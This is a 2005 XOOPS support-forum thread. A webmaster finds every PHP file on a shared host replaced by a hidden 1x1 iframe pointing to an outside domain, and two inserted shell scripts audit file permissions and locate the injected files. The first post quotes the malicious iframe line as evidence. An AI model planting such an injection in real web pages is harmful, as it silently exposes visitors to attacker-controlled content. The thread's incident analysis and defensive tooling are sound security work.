1
blueangel
Bad surprise on Monday morning! Site hacked
  • 2005/5/16 6:47

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


I had a very, very bad surprise while I was accessing my site: a blank page!

It was not the first time, and I was thinking "it is a problem with the server database being down, in a few minutes it will come back". But at the bottom of my Firefox browser I saw some strange "redirections" to the site http://www.tendomain.com and I had a bad feeling that something was broken.

I started the FTP client and found that ALL PHP files on the server were 106 bytes long, with the following content:

<iframe src="http://www.tendomain.com/or2.html" frameborder="0" border="0" height="1" width="1"></iframe>


How could this have happened?

I am not a beginner with XOOPS: I have been the Italian XOOPS support site webmaster for many years and I know all the basic security rules that a XOOPS site must follow! The site was running the latest version of XOOPS, and I had not recently installed any new modules.

Maybe there is a vulnerability in XOOPS that has not been found yet; I am really lost now. I am lucky that the database is safe!

What can I do in order to understand what has happened?

2
Mithrandir
Re: Bad surprise on Monday morning! Site hacked

You should contact your host. Overwriting files outside the cache, templates_c and uploads directories is not possible through XOOPS if the folder permissions are set correctly.

3
blueangel
Re: Bad surprise on Monday morning! Site hacked
  • 2005/5/16 10:53

Does it mean that if all folder permissions are set to CHMOD 755 and all file permissions are set to CHMOD 644, except for the mentioned folders, it is a problem with my hosting?

Is it possible that one module, not an official one, has some "holes" that can be used by a hacker to cause the problem I have on my website?

4
Mithrandir
Re: Bad surprise on Monday morning! Site hacked

If the permissions are set through FTP so that the files are not writeable by the webserver (which usually runs as a different user than the FTP account), there is no way the webserver can change those permissions or the file contents.

So contact the host (without passing blame) and ask whether they have had similar problems with other sites and whether they have already found the cause.

Then roll back to a backed up version of the website files.
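As an added example (not code from this thread, from XOOPS or from the hosting company), here is the check that Mithrandir's advice implies, written for a POSIX shell on the host: it lists everything under the web root that the web server process could write to, outside the three directories XOOPS needs writable, and can reapply the 755/644 layout blueangel describes. It assumes the FTP account owns the files and the web server runs as a different, unprivileged user; the directory names cache, templates_c and uploads are the ones named in the thread, and the chmod 777 on them is a placeholder that a host may replace with a group grant.

```shell
#!/bin/sh
# Added example for this thread, not code from XOOPS or from the posters.
# Audit a web root for anything the web server process could overwrite.
# Assumptions (not stated in the thread): files are owned by the FTP account,
# the web server runs as a different unprivileged user, and only cache/,
# templates_c/ and uploads/ are meant to be writable by it.

# List paths under $1 that have the "others write" bit set (octal 002) and
# are not inside the three directories XOOPS needs writable.
# Prints one path per line; exit status 0 when nothing is found, 1 otherwise.
audit_writable() {
    root=${1%/}
    hits=$(find "$root" \
        \( -path "$root/cache" -o -path "$root/templates_c" -o -path "$root/uploads" \) -prune \
        -o -perm -002 -print)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Number of findings, for scripts that only want a count.
count_writable() {
    audit_writable "$1" | grep -c .
}

# Reapply the layout described in the thread: 755 on directories, 644 on
# files, then reopen only the three runtime directories.
fix_permissions() {
    root=${1%/}
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    for d in cache templates_c uploads; do
        if [ -d "$root/$d" ]; then
            chmod 777 "$root/$d"   # placeholder; a group grant is safer where the host allows it
        fi
    done
    return 0
}

# Usage: sh audit.sh /path/to/xoops_root
if [ $# -gt 0 ]; then
    audit_writable "$1"
fi
```

A clean result from this audit only tells you that a script running as the web server user cannot rewrite your files; it says nothing about a process running as root or as the file owner, which is why the shared-host question in this thread matters.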

5
blueangel
Re: Bad surprise on Monday morning! Site hacked
  • 2005/5/16 12:09

OK, I will contact the hosting company. Thanks for your support.

6
blueangel
Re: Bad surprise on Monday morning! Site hacked
  • 2005/5/16 15:14

The administrator of the server answered that they were attacked through a vulnerability in a PHPNuke site hosted on the same server!!

Luckily they did a complete backup on Saturday, and they have confirmed that the site will be available again in a couple of hours.

7
Mithrandir
Re: Bad surprise on Monday morning! Site hacked

I'm not a security expert, but I think I know enough not to open big holes in my code, and I wouldn't think that a PHP script vulnerability could do what you describe.

Even if a script is uploaded through FTP to a webserver and run, I would not think it possible to modify files not owned by the user account used by the webserver, unless the files were writeable by everyone (which XOOPS files should not be, except in the cache, templates_c and uploads directories).

I don't know all the details, but my guess is that your host is playing a bit of "pin the tail on the donkey" to cover up insufficient security settings (enabling safe mode, disallowing system command execution through webserver scripts and similar) or a lack of patching of the webserver/OS.

I may be wrong of course, but until further information, this is what I will think.

8
blueangel
Re: Bad surprise on Monday morning! Site hacked
  • 2005/5/16 16:08

Quote:
I don't know all the details, but my guess is that your host is playing a bit of "pin the tail on the donkey" to cover up insufficient security settings (enabling safe mode, disallowing system command execution through webserver scripts and similar) or a lack of patching of the webserver/OS.


I agree with you. I believe that a hacker is able to exploit a vulnerability in a PHP Nuke site in order to upload a malicious script to the server, but I also believe that with a good configuration it is possible to prevent this script from affecting other accounts, even if my site is on "shared hosting".

I only hope that they will take the necessary precautions so that this problem will not happen again.

9
blueangel
Re: Bad surprise on Monday morning! Site hacked
  • 2005/5/17 9:51

I am happy to announce to all Italian users that the official Italian support site is online again. All the data has been successfully restored. Ciao

10
banned
Re: Bad surprise on Monday morning! Site hacked
  • 2005/5/17 12:42

  • banned

  • Not too shy to talk

  • Posts: 159

  • Since: 2004/5/16


Blueangel,
The problem was on the server (I have a couple of sites on the same server, a XOOPS one and a Mambo one, and I got the problem on every site), not with XOOPS.

The _strange_ thing that I noticed on my XOOPS website is that all files with .php, .html, .htm and .shtml extensions were overwritten with that iframe, except the files in XOOPS_ROOT/modules/system/
(I also looked at xoopsit; same thing for you)

banned
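As an added example (again not code from this thread or from XOOPS), here is a small POSIX shell toolkit for the triage banned describes: it finds which .php/.html/.htm/.shtml files now carry an iframe whose src points off-site, shows the bulk overwrite through the fact that many files share one size (106 bytes in blueangel's case), and lists what differs from the Saturday backup. The own-host argument, the function names and the sample tree in the usage are constructed for the example; the only facts taken from the thread are the tendomain.com iframe and the four extensions.

```shell
#!/bin/sh
# Added example for this thread, not code from XOOPS or from the posters.
# Triage helpers for a web root whose files were replaced with a 1x1 iframe.
# Assumptions: a POSIX shell with find, grep -o, wc, awk, sort, uniq, diff.

# Print web files under $1 that contain an <iframe> whose src host is not $2
# (your own hostname). Files embedding your own content are left out.
find_injected() {
    root=${1%/}; own_host=$2
    find "$root" -type f \
        \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.shtml' \) \
        -exec grep -l -i '<iframe[^>]*src="http' {} + 2>/dev/null |
    while IFS= read -r f; do
        # keep the file only if at least one iframe src points at another host
        if grep -E -i -o '<iframe[^>]*src="https?://[^/"]*' "$f" |
           grep -F -v -q -i -- "://$own_host"; then
            printf '%s\n' "$f"
        fi
    done
}

# Many files of identical size is the signature of a bulk overwrite.
# Prints "count size" pairs for web files, most common size first.
size_histogram() {
    root=${1%/}
    find "$root" -type f \
        \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.shtml' \) \
        -exec wc -c {} + | awk '$NF != "total" {print $1}' | sort -n | uniq -c | sort -rn
}

# Everything that differs between the backup tree $1 and the live tree $2,
# whatever the extension, so nothing outside the obvious file types is missed.
changed_since_backup() {
    diff -rq "$1" "$2"
}

# Usage: sh triage.sh /path/to/live_root www.example.org [/path/to/backup]
if [ $# -ge 2 ]; then
    find_injected "$1" "$2"
    size_histogram "$1"
    [ $# -ge 3 ] && changed_since_backup "$3" "$1"
fi
```

Run find_injected before restoring so you keep a list of what was touched; the histogram is the quick sanity check that the damage is a single bulk write rather than targeted edits, and the diff against the backup is what tells you whether anything outside the four extensions (a .htaccess, an uploaded shell) also changed.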
